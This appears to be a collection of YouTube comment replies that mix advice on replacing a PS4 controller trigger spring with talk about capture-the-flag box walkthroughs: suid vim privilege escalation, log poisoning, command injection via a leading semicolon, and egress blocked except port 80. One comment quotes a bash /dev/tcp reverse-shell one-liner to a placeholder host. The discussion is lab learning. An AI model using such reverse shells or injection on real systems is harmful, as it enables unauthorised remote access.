Basically tough plastic so it won't break anything, you probably have something like that already. Force it between the top and bottom half and when it's in, slide it along the seam. Re: steam, back when I was using that controller, steam support wasn't what it is now 😭. I don't have it anymore, otherwise I'd test it out. I'd think it would be good though.

Sure, so obviously you gotta disassemble it and take a look at the trigger assembly; there could be a small piece of plastic or something rough interfering with the action. The spring itself should be good; if it were broken then it would feel weak as opposed to sticky. I have dealt with replacing a broken spring in this thing, and it's no fun at all so I hope that's not your situation.

the suid vim is located on the target box. so if we're running it, that means we're on there already. the python command is not a revshell, it's just the way to get root.

I took a look, and if you look up "ps4 trigger spring", that should be the part you need. They're quite inexpensive, and in this controller pretty easy to replace. The spring goes on a little post which is accessible when you push the trigger out/up a little towards the inside. When I disassembled mine to check it out, I actually broke one, so I may be getting some. I don't play ps4 anymore though, so I may let it rest.

@@mobilephone6388 no, the shape is a bit unusual. Probably better just to get a new controller. And then next time something breaks, you'll have a replacement for the part!

this was a long time ago, but I researched a lot into log poisoning and getting a shell based off that. I think there are endless examples out there.

I don't remember this box exactly, but I would have tried everything else I could before using, much less documenting using, a kernel exploit. I would also have used my root permissions to find other privilege escalation vectors before making this video, and called them out.

There are just some screws on the bottom and once they're out, you pop the top cover off.

No it won't break. I think I broke one off because I wasn't being careful and it's still fine.

Yeah it's very CTF-y. So that's why I didn't offer any explanation. I just banged my head against it for hours, got it, and that work was boiled down to a slight hesitation in my verbal delivery.

For sure, that's one way to do it; there are arguments for and against it. As one example, say the root revshell dies (or something goes wrong during initiation) before effective changes can be made - another reboot would be required.

This is a basic, low-level reverse shell using mkfifo. Google "mkfifo bash reverse shell", the first result should get you to pentestmonkey's revshell sheet. This machine is nice because you can just type the command into the text box, don't have to worry about quoting, escaping etc, apart from the leading semicolon

@@tje210tje got the reverse shell now. Machine is probably blocking all ports except port 80.

@@element-1254 yeah that's why I hated that box and the video was super short. I'd tried multiple reverse shells, pretty much the only reasonable thing I hadn't tried was port 80.

@@tje210tje you mean like 'bash -i >& /dev/tcp/$IP/$PORT 0>&1' ? This doesn't work for me, this also doesn't work for any of unixes in my lab cause there are no /dev/tcp nowadays, IDK how you got this working

If you finally get root shell andh check it's iptables rules.. you will find out it's output chain only allows port ssh dns and http which is 22 53 and 80
